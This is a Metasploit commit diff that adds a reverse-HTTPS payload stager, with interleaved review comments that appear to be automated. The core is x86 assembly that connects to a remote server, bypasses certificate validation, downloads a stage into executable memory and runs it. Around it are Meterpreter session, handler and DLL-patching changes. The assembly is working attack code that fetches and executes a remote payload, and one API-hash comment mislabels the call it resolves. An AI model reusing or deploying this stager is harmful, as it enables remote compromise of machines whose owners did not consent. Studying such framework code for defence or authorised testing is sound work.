Small patch to enable a new stager

git-svn-id: file:///home/svn/framework3/trunk@8984 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2010-04-03 05:21:15 +00:00
parent 5d0fb434b7
commit c6c956ab46
43 changed files with 331 additions and 85 deletions

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.


@ -32,7 +32,7 @@
#include "list.h"
//#define DEBUGTRACE
// #define DEBUGTRACE
#ifdef DEBUGTRACE
#define dprintf(...) real_dprintf(__VA_ARGS__)


@ -1,17 +1,17 @@
#include "precomp.h"
#include "./../sys/session.h"
#include "./../sys/process/ps.h"
typedef struct _DESKTOPLIST
{
DWORD dwSessionId;
char * cpStationName;
Packet * response;
typedef struct _DESKTOPLIST
{
DWORD dwSessionId;
char * cpStationName;
Packet * response;
} DESKTOPLIST, *LPDESKTOPLIST;
/*
* Callback function for EnumDesktops when listing desktops on a station during desktop_list().
*/
/*
* Callback function for EnumDesktops when listing desktops on a station during desktop_list().
*/
BOOL CALLBACK desktop_enumdesktops_callback( LPTSTR cpDesktopName, LPARAM lpParam )
{
DESKTOPLIST * dl = NULL;
@ -48,12 +48,12 @@ BOOL CALLBACK desktop_enumdesktops_callback( LPTSTR cpDesktopName, LPARAM lpPara
return TRUE;
}
/*
* Callback function for EnumWindowStations when listing stations during request_ui_desktop_enum().
/*
* Callback function for EnumWindowStations when listing stations during request_ui_desktop_enum().
*/
BOOL CALLBACK desktop_enumstations_callback( LPTSTR cpStationName, LPARAM param )
{
HWINSTA hWindowStation = NULL;
HWINSTA hWindowStation = NULL;
DESKTOPLIST dl = {0};
do
@ -68,11 +68,11 @@ BOOL CALLBACK desktop_enumstations_callback( LPTSTR cpStationName, LPARAM param
EnumDesktops( hWindowStation, desktop_enumdesktops_callback, (LPARAM)&dl );
} while( 0 );
if( hWindowStation )
CloseWindowStation( hWindowStation );
} while( 0 );
if( hWindowStation )
CloseWindowStation( hWindowStation );
return TRUE;
}
@ -217,8 +217,8 @@ DWORD request_ui_desktop_set( Remote * remote, Packet * request )
if( hDesktop )
CloseDesktop( hDesktop );
if( hWindowStation )
if( hWindowStation )
CloseWindowStation( hWindowStation );
if( hOrigWindowStation )


@ -268,7 +268,7 @@ static BOOL server_negotiate_ssl(Remote *remote)
dprintf("[SERVER] Sending a HTTP GET request to the remote side...");
if( (ret = SSL_write(remote->ssl, "GET / HTTP/1.0\r\n\r\n", 18)) <= 0 )
if( (ret = SSL_write(remote->ssl, "GET /123456789 HTTP/1.0\r\n\r\n", 27)) <= 0 )
{
dprintf("[SERVER] SSL write failed during negotiation with return: %d (%d)", ret, SSL_get_error(remote->ssl, ret));
}
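Review bot: The request literal and its byte count are coupled by hand in the new `SSL_write` call, so `27` has to be recounted whenever the path changes and a miscount either truncates the request or reads past the literal. Naming the string and deriving the length keeps the two in step, e.g. `static const char hello[] = "GET /123456789 HTTP/1.0\r\n\r\n";` and `SSL_write(remote->ssl, hello, sizeof(hello) - 1)`. A comment should also say that `/123456789` is a placeholder: the Ruby `stage_payload` change in this commit searches the built DLL for `/123456789 HTTP/1.0\r\n\r\n\x00` and overwrites it, so the literal cannot be reworded without updating that search string. server_negotiate_ssl starts and ends outside the hunk.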


@ -0,0 +1,157 @@
;-----------------------------------------------------------------------------;
; Author: HD Moore
; Compatible: ?
; Version: 1.0
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the socket for the connection to the server
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
load_wininet:
push 0x0074656e ; Push the bytes 'wininet',0 onto the stack.
push 0x696e6977 ; ...
mov esi, esp ; Save a pointer to wininet
push esp ; Push a pointer to the "wininet" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "wininet" )
internetopen:
xor edi,edi
push edi ; DWORD dwFlags
push edi ; LPCTSTR lpszProxyBypass
push edi ; LPCTSTR lpszProxyName
push edi ; DWORD dwAccessType (PRECONFIG = 0)
push esi ; LPCTSTR lpszAgent
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
mov esi, eax ; save the HINTERNET handle
jmp get_server_host
internetconnect:
pop ebx ; Save the hostname pointer
xor ecx, ecx
push ecx ; DWORD_PTR dwContext (NULL)
push ecx ; dwFlags
push byte 3 ; DWORD dwService (INTERNET_SERVICE_HTTP)
push ecx ; password
push ecx ; username
push dword 4444 ; PORT
push ebx ; HOSTNAME
push esi ; HINTERNET hInternet
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call ebp
mov esi, eax ; hConnection
jmp get_server_uri
httpopenrequest:
pop ecx
xor edx, edx ; NULL
push edx ; dwContext (NULL)
push (0x80000000 | 0x04000000 | 0x00800000 | 0x00400000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
;0x00800000 | ; INTERNET_FLAG_SECURE
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
;0x00000200 ; INTERNET_FLAG_NO_UI
push edx ; accept types
push edx ; referrer
push edx ; version
push ecx ; url
push edx ; method
push esi ; hConnection
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp
mov esi, eax ; hHttpRequest
httpsendrequest:
xor eax, eax
push eax ; optional length
push eax ; optional
push eax ; dwHeadersLength
push eax ; headers
push esi ; hHttpRequest
push 0x7B18062D ; hash( "wininet.dll", "InternetCloseHandleA" )
call ebp
test eax,eax
jnz short allocate_memory
check_ssl:
; In the case of an invalid certificate authority, we have to wait until the error occurs,
; set an option to disable it, then try it all over again. This wastes shellcode space,
; but its required to use this payload without a valid signed cert.
push 0x5DE2C5AA ; hash( "kernel32.dll", "GetLastError" )
call ebp
cmp eax, 12045 ; ERROR_INTERNET_INVALID_CA
jne failure
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
set_security_options:
push 0x00003380
mov eax, esp
push 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push byte 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
pop eax ; clear temporary storage
; Try it again
jmp short httpsendrequest
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
allocate_memory:
push byte 0x40 ; PAGE_EXECUTE_READWRITE
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (8Mb ought to do us)
push byte 0 ; NULL as we dont care where the allocation is.
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
xchg eax, ebx ; place the allocated base address in ebx
push ebx ; store a copy of the stage base address on the stack
push byte 0 ; temporary storage for bytes read count
mov edi, esp ; &bytesRead
download_more:
push edi ; &bytesRead
push 8192 ; 8k read
push ebx ; buffer
push esi ; hRequest
push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" )
call ebp
test eax,eax ; download failed?
jz failure
mov eax, [edi]
add ebx, eax ; buffer += bytes_received
test eax,eax
jnz download_more ; continue until it returns 0
pop eax ; clear the temporary storage
execute_stage:
ret ; dive into the stored stage address
get_server_uri:
call httpopenrequest
server_uri:
db "/123456789", 0x00
get_server_host:
call internetconnect
server_host:
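Review bot: Several comments in this new block do not match the instructions beside them. Under `httpsendrequest:` the pushed hash is labelled `hash( "wininet.dll", "InternetCloseHandleA" )`, yet the five arguments before it are annotated as the headers and optional-data parameters of a send-request call, so the label should name the function the hash actually resolves to. `push 0x00400000` is annotated `8Mb ought to do us` but the value is 4 MiB, and since `download_more` advances `ebx` by every read without comparing against that size, the limit the stage must stay under is worth stating in the comment. The header line `Output: EDI will be the socket` looks carried over from a TCP block: here `edi` is left pointing at the bytes-read slot and `esi` holds the request handle. `push 0x00003380` would read better with its individual flag names listed, as was done for `dwFlags` above.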


@ -0,0 +1,19 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 274 bytes
; Build: >build.py stager_reverse_tcp_nx
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_https.asm"
; By here we will have performed the reverse_tcp connection and EDI will be our socket.
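Review bot: The header and closing comment of this new stager were copied from another file and no longer describe it: `Size: 274 bytes` and `Build: >build.py stager_reverse_tcp_nx` refer to a different stager, and the last comment still says `we will have performed the reverse_tcp connection and EDI will be our socket` although the block included is `block_reverse_https.asm`. Update the build line to this file's own name, re-measure or drop the size, and reword the closing comment to say what the included block really leaves in the registers. The next new file, the one including `block_reverse_tcp_dns.asm`, carries the same copied `Size` and `Build` lines.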


@ -0,0 +1,20 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 274 bytes
; Build: >build.py stager_reverse_tcp_nx
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_tcp_dns.asm"
; By here we will have performed the reverse_tcp connection and EDI will be our socket.
; This stager assumes the next stage is already in memory and working from EDI


@ -55,13 +55,13 @@ class Meterpreter < Rex::Post::Meterpreter::Client
# Initializes a meterpreter session instance using the supplied rstream
# that is to be used as the client's connection to the server.
#
def initialize(rstream)
def initialize(rstream, opts={})
super
#
# Initialize the meterpreter client
#
self.init_meterpreter(rstream)
self.init_meterpreter(rstream, opts)
#
# Create the console instance
@ -256,6 +256,8 @@ class Meterpreter < Rex::Post::Meterpreter::Client
attr_accessor :platform
attr_accessor :binary_suffix
attr_accessor :console # :nodoc:
attr_accessor :skip_ssl
attr_accessor :target_id
protected


@ -9,7 +9,7 @@ module Sessions
#
###
class Meterpreter_x64_Win < Msf::Sessions::Meterpreter
def initialize(rstream)
def initialize(rstream, opts={})
super
self.platform = 'x64/win64'
self.binary_suffix = 'x64.dll'
@ -18,3 +18,4 @@ end
end
end


@ -9,7 +9,7 @@ module Sessions
#
###
class Meterpreter_x86_BSD < Msf::Sessions::Meterpreter
def initialize(rstream)
def initialize(rstream, opts={})
super
self.platform = 'x86/bsd'
self.binary_suffix = 'bso'
@ -18,3 +18,4 @@ end
end
end


@ -9,7 +9,7 @@ module Sessions
#
###
class Meterpreter_x86_Linux < Msf::Sessions::Meterpreter
def initialize(rstream)
def initialize(rstream, opts={})
super
self.platform = 'x86/linux'
self.binary_suffix = 'lso'
@ -18,3 +18,4 @@ end
end
end


@ -9,7 +9,7 @@ module Sessions
#
###
class Meterpreter_x86_Win < Msf::Sessions::Meterpreter
def initialize(rstream)
def initialize(rstream,opts={})
super
self.platform = 'x86/win32'
self.binary_suffix = 'dll'
@ -18,3 +18,4 @@ end
end
end


@ -8,7 +8,7 @@ module Sessions
#
#
###
class VncInject
class VncInject
#
# The vncinject session is interactive
@ -20,7 +20,7 @@ class VncInject
# Initializes a vncinject session instance using the supplied rstream
# that is to be used as the client's connection to the server.
#
def initialize(rstream)
def initialize(rstream, opts={})
super
self.conn_eof = false
@ -84,7 +84,7 @@ class VncInject
def interactive?
false
end
##
#
# VNC Server specific interfaces
@ -107,7 +107,7 @@ class VncInject
'LocalHost' => host,
'Stream' => true,
'OnLocalConnection' => Proc.new {
if (self.got_conn == true)
nil
else
@ -117,17 +117,17 @@ class VncInject
end
},
'OnConnectionClose' => Proc.new {
if (self.conn_eof == false)
if (self.conn_eof == false)
print_status("VNC connection closed.")
self.conn_eof = true
# Closing time
self.view.kill if self.view
self.view = nil
self.kill
end
},
'__RelayType' => 'vncinject')
end
@ -141,10 +141,10 @@ class VncInject
# Launches VNC viewer against the local relay for this VNC server session.
#
def autovnc
vnc =
Rex::FileUtils::find_full_path('vncviewer') ||
vnc =
Rex::FileUtils::find_full_path('vncviewer') ||
Rex::FileUtils::find_full_path('vncviewer.exe')
if (vnc)
self.view = Thread.new {
system("vncviewer #{vlhost}::#{vlport}")
@ -165,4 +165,5 @@ protected
end
end
end
end


@ -126,8 +126,8 @@ module Handler
# connections. The default behavior is to attempt to create a session for
# the payload. This path will not be taken for multi-staged payloads.
#
def handle_connection(conn)
create_session(conn)
def handle_connection(conn, opts={})
create_session(conn, opts)
end
#
@ -178,14 +178,14 @@ protected
# Sessions are only created if the payload that's been mixed in has an
# associated session.
#
def create_session(conn)
def create_session(conn, opts={})
# If there is a parent payload, then use that in preference.
return parent_payload.create_session(conn) if (parent_payload)
return parent_payload.create_session(conn, opts) if (parent_payload)
# If the payload we merged in with has an associated session factory,
# allocate a new session.
if (self.session)
s = self.session.new(conn)
s = self.session.new(conn, opts)
# Pass along the framework context
s.framework = framework


@ -14,7 +14,7 @@ class Handler::BindTcp::UnitTest < Test::Unit::TestCase
end
module Foo
def handle_connection(client)
def handle_connection(client, opts={})
self.success = 1
end
@ -48,4 +48,5 @@ class Handler::BindTcp::UnitTest < Test::Unit::TestCase
end
end
end


@ -45,12 +45,12 @@ module FindPort
#
def handler(sock)
return if not sock
_find_prefix(sock)
# Flush the receive buffer
sock.get_once(-1, 1)
# If this is a multi-stage payload, then we just need to blindly
# transmit the stage and create the session, hoping that it works.
if (self.payload_type != Msf::Payload::Type::Single)
@ -83,12 +83,12 @@ protected
# Wrapper to create session that makes sure we actually have a session to
# create...
#
def create_session(sock)
def create_session(sock, opts={})
go = true
# Give the payload a chance to run
Rex::ThreadSafe.sleep(1.5)
# This is a hack. If the session is a shell, we check to see if it's
# functional by sending an echo which tells us whether or not we're good
# to go.
@ -100,8 +100,8 @@ protected
# If we're good to go, create the session.
rv = (go == true) ? super : nil
if (rv)
self._handler_return_value = Claimed
end
@ -117,7 +117,7 @@ protected
ebuf = Rex::Text.rand_text_alphanumeric(16)
# Send any identifying information that the find sock may need on
# the other side, such as a tag. If we do actually send something,
# the other side, such as a tag. If we do actually send something,
# wait a bit longer to let the remote side find us.
if (_send_id(sock))
Rex::ThreadSafe.sleep(1.5)
@ -147,3 +147,4 @@ end
end
end


@ -15,7 +15,7 @@ class Handler::ReverseTcp::UnitTest < Test::Unit::TestCase
end
module Foo
def handle_connection(client)
def handle_connection(client, opts={})
self.success = 1
end
@ -43,9 +43,9 @@ class Handler::ReverseTcp::UnitTest < Test::Unit::TestCase
begin
Rex::ThreadSafe.sleep(1)
assert_equal(1, h.success)
h.success = 0
ensure
t.close
@ -59,4 +59,5 @@ class Handler::ReverseTcp::UnitTest < Test::Unit::TestCase
end
end
end


@ -616,7 +616,7 @@ protected
#
# The list of options that support merging in an information hash.
#
UpdateableOptions = [ "Name", "Description", "Alias" ]
UpdateableOptions = [ "Name", "Description", "Alias", "PayloadCompat" ]
#
# Sets the modules unsupplied info fields to their default values.


@ -15,7 +15,7 @@ module Payload::Osx::BundleInject
'Name' => 'Mac OS X Inject Mach-O Bundle',
'Version' => '$Revision$',
'Description' => 'Inject a custom Mach-O bundle into the exploited process',
'Author' =>
'Author' =>
[
'ddz',
],
@ -69,7 +69,7 @@ module Payload::Osx::BundleInject
# Transmits the DLL injection payload and its associated DLL to the remote
# computer so that it can be loaded into memory.
#
def handle_connection_stage(conn)
def handle_connection_stage(conn, opts={})
data = ""
begin
@ -98,3 +98,4 @@ module Payload::Osx::BundleInject
end
end
end


@ -18,7 +18,7 @@ module Msf::Payload::Stager
# Return the stager payload's raw payload.
#
def payload
return module_info['Stager']['Payload']
return module_info['Stager']['Payload']
end
#
@ -83,7 +83,7 @@ module Msf::Payload::Stager
#
# Transmit the associated stage.
#
def handle_connection(conn)
def handle_connection(conn, opts={})
# If the stage should be sent over the client connection that is
# established (which is the default), then go ahead and transmit it.
if (stage_over_connection?)
@ -123,7 +123,7 @@ module Msf::Payload::Stager
end
# Give the stages a chance to handle the connection
handle_connection_stage(conn)
handle_connection_stage(conn, opts)
end
#
@ -131,8 +131,8 @@ module Msf::Payload::Stager
# whatever it is it needs to process. The default is to simply attempt to
# create a session.
#
def handle_connection_stage(conn)
create_session(conn)
def handle_connection_stage(conn, opts={})
create_session(conn, opts={})
end
#
@ -152,7 +152,7 @@ module Msf::Payload::Stager
# Generate an encoded version of the stage. We tell the encoding system
# to save edi to ensure that it does not get clobbered.
encp = Msf::EncodedPayload.create(
self,
self,
'Raw' => stg,
'SaveRegisters' => ['edi'],
'ForceEncode' => true)
@ -172,3 +172,4 @@ module Msf::Payload::Stager
attr_accessor :stage_prefix
end
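Review bot: In the default `handle_connection_stage`, the call `create_session(conn, opts={})` is an assignment expression rather than a default: it rebinds `opts` to a new empty hash and passes that, so whatever options the caller supplied are discarded before the session is created. The call should read `create_session(conn, opts)`. The `={}` belongs only on the `def` line above it, as in the `handle_connection` change earlier in this file, which forwards `opts` unchanged.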


@ -27,7 +27,7 @@ module Payload::Windows::DllInject
'Arch' => ARCH_X86,
'PayloadCompat' =>
{
'Convention' => 'sockedi -passivex',
'Convention' => 'sockedi -passivex -https'
},
'Stage' =>
{
@ -203,7 +203,7 @@ module Payload::Windows::DllInject
# Transmits the DLL injection payload and its associated DLL to the remote
# computer so that it can be loaded into memory.
#
def handle_connection_stage(conn)
def handle_connection_stage(conn, opts = {})
data = library_name + "\x00"
begin


@ -24,6 +24,10 @@ module Payload::Windows::Exec
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'PayloadCompat' =>
{
'Convention' => '-passivex -https',
},
'Payload' =>
{
'Offsets' =>
@ -70,3 +74,4 @@ module Payload::Windows::Exec
end
end


@ -27,7 +27,7 @@ module Payload::Windows::ReflectiveDllInject
'Arch' => ARCH_X86,
'PayloadCompat' =>
{
'Convention' => 'sockedi',
'Convention' => 'sockedi -https',
},
'Stage' =>
{
@ -46,7 +46,7 @@ module Payload::Windows::ReflectiveDllInject
datastore['DLL']
end
def stage_payload
def stage_payload(target_id=nil)
dll = ""
offset = 0
@ -99,6 +99,18 @@ module Payload::Windows::ReflectiveDllInject
# patch the bootstrap code into the dll's DOS header...
dll[ 0, bootstrap.length ] = bootstrap
# patch the target ID into the URI if specified
if target_id
i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
if i
t = target_id.to_s
raise "Target ID must be less than 9 bytes" if t.length > 8
u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
print_status("Patching Target ID #{t} into DLL")
dll[i, u.length] = u
end
end
# return our stage to be loaded by the intermediate stager
return dll
end
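Review bot: `target_id.to_s` is spliced into an HTTP request line with only a length check, so a value containing a space, CR/LF or NUL yields a malformed request, and an empty string passes as well. Restrict it before patching, for example `raise "Target ID must be 1-8 alphanumeric characters" unless t =~ /\A[A-Za-z0-9]{1,8}\z/`. The current message says "less than 9 bytes" while `String#length` counts characters on newer Rubies; an ASCII-only pattern makes the two agree. A shorter ID also leaves the NUL and leftover placeholder bytes inside the region the C side writes with a fixed length of 27, so that coupling deserves a comment here. stage_payload begins in the previous hunk and its body is only partly visible.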


@ -20,7 +20,7 @@ module Interactive
#
# Initializes the session.
#
def initialize(rstream)
def initialize(rstream, opts={})
self.rstream = rstream
super()
end


@ -60,8 +60,8 @@ class Client
# Initializes the client context with the supplied socket through
# which communication with the server will be performed.
#
def initialize(sock, to = self.class.default_timeout)
init_meterpreter(sock, to)
def initialize(sock,opts={})
init_meterpreter(sock, opts)
end
#
@ -74,17 +74,22 @@ class Client
#
# Initializes the meterpreter client instance
#
def init_meterpreter(sock, to = self.class.default_timeout)
def init_meterpreter(sock,opts={})
self.sock = sock
self.parser = PacketParser.new
self.ext = ObjectAliases.new
self.ext_aliases = ObjectAliases.new
self.response_timeout = to
self.send_keepalives = true
self.alive = true
self.target_id = opts[:target_id]
# Switch the socket to SSL mode
swap_sock_plain_to_ssl()
self.response_timeout = opts[:timeout] || self.class.default_timeout
self.send_keepalives = true
# Switch the socket to SSL mode and receive the hello if needed
if not opts[:skip_ssl]
swap_sock_plain_to_ssl()
end
register_extension_alias('core', ClientCore.new(self))
@ -108,9 +113,9 @@ class Client
self.sock.sslsock = ssl
self.sock.sslctx = ctx
tag = self.sock.read(18)
if(not tag or tag != "GET / HTTP/1.0\r\n\r\n")
raise RuntimeError, "Could not read the SSL hello tag"
tag = self.sock.get_once(-1, 30)
if(not tag or tag !~ /^GET \//)
raise RuntimeError, "Could not read the HTTP hello token"
end
end
@ -316,6 +321,11 @@ class Client
# this will be false
#
attr_accessor :alive
#
# The unique target identifier for this payload
#
attr_accessor :target_id
protected
attr_accessor :parser, :ext_aliases # :nodoc:
attr_writer :ext, :sock # :nodoc:
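Review bot: Replacing the second positional parameter of `initialize` and `init_meterpreter` (previously the timeout `to`) with an options hash silently changes the meaning of any existing call that passes a number there, because `opts[:target_id]` and `opts[:timeout]` would then be evaluated on an Integer instead of a Hash. Callers are not visible in this diff, so this may already be handled elsewhere, but a guard at the top of `init_meterpreter` keeps old call sites working, e.g. `opts = { :timeout => opts } unless opts.kind_of?(Hash)`. The doc comment above `initialize` should also list the recognised keys (`:timeout`, `:skip_ssl`, `:target_id`).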


@ -31,6 +31,10 @@ module Metasploit3
'Version' => '$Revision$',
'Description' => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)',
'Author' => ['skape','sf'],
'PayloadCompat' =>
{
'Convention' => 'sockedi',
},
'License' => MSF_LICENSE,
'Session' => Msf::Sessions::Meterpreter_x86_Win))
@ -44,3 +48,4 @@ module Metasploit3
end
end


@ -30,7 +30,7 @@ module Metasploit3
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'sockedi'
'Convention' => 'sockedi -https'
},
'Stage' =>
{
@ -59,3 +59,4 @@ module Metasploit3
end
end


@ -28,6 +28,10 @@ module Metasploit3
'Platform' => 'win',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'sockedi -https'
},
'Stage' =>
{
'Offsets' =>
@ -99,3 +103,4 @@ module Metasploit3
end
end


@ -12,7 +12,7 @@ require 'msf/base/sessions/vncinject'
module Metasploit3
include Msf::Payload::Windows::ReflectiveDllInject
def initialize(info = {})
super(update_info(info,
'Name' => 'VNC Server (Reflective Injection)',
@ -20,7 +20,7 @@ module Metasploit3
'Description' => 'Inject a VNC Dll via a reflective loader (staged)',
'Author' => [ 'sf' ],
'Session' => Msf::Sessions::VncInject ))
# Override the DLL path with the path to the meterpreter server DLL
register_options(
@ -95,7 +95,7 @@ module Metasploit3
print_status("Launched vnciewer in the background.")
end
end
super
end